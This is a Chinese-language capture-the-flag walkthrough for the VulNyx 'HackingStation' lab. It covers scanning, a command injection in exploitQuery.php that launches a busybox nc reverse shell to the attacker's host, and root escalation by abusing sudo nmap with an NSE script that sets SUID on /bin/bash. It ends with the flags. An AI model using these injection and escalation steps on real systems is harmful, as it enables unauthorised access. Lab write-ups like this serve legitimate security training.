Vlx_HackingStation

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:13 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00045s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00034s latency).
MAC Address: 08:00:27:52:FA:08 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.70
Host is up (0.00079s latency).
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.51 seconds

靶机IP：192.168.2.70

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.70                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:14 +0800
Nmap scan report for 192.168.2.70
Host is up (0.00059s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

开放端口：80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p80 192.168.2.70 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:14 +0800
Nmap scan report for 192.168.2.70
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: HackingStation
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.27 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.70                 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:15 +0800
Nmap scan report for 192.168.2.70
Host is up (0.0012s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 112.46 seconds

二、WEB渗透

1、HTTP服务

访问80端口，是一个黑客工作站，可以进行漏洞搜索

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.70 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.70
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 684]
javascript           (Status: 301) [Size: 317] [--> http://192.168.2.70/javascript/]
server-status        (Status: 403) [Size: 277]
Progress: 1042622 / 1323348 (78.79%)^C

没有发现任何东西

三、获取hacker权限

在搜索框中，尝试执行id命令 发现能够执行命令

直接反弹shell

http://192.168.2.70/exploitQuery.php?product=rev&busybox nc 192.168.2.4 4444 -e /bin/bash

成功获取到shell

┌──(root㉿kali)-[/tmp]
└─# nc -lvnp 4444              
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.70] 49748
id
uid=1000(hacker) gid=1000(hacker) groups=1000(hacker)

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

查看sudo -l

hacker@HackingStation:/home/hacker$ sudo -l
Matching Defaults entries for hacker on HackingStation:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User hacker may run the following commands on HackingStation:
    (root) NOPASSWD: /usr/bin/nmap
hacker@HackingStation:/home/hacker$ TF=$(mktemp)
hacker@HackingStation:/home/hacker$ echo 'os.execute("chmod 4755 /bin/bash")' > $TF
hacker@HackingStation:/home/hacker$ sudo /usr/bin/nmap --script=$TF      
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-05 03:46 CET
NSE: Warning: Loading '/tmp/tmp.bRbOFSDZxO' -- the recommended file extension is '.nse'.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:636: /tmp/tmp.bRbOFSDZxO is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:636: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:840: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
        [C]: in ?

QUITTING!

成功获取到root权限

hacker@HackingStation:/home/hacker$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash
hacker@HackingStation:/home/hacker$ /bin/bash -p
bash-5.2# id
uid=1000(hacker) gid=1000(hacker) euid=0(root) groups=1000(hacker)

五、查看FLAG

bash-5.2# cat /root/root.txt /home/hacker/user.txt 
f900f7fb7d2c5ea64deca6378ebe5ead
e34efd51251772a8abc4cc00ee52bb0a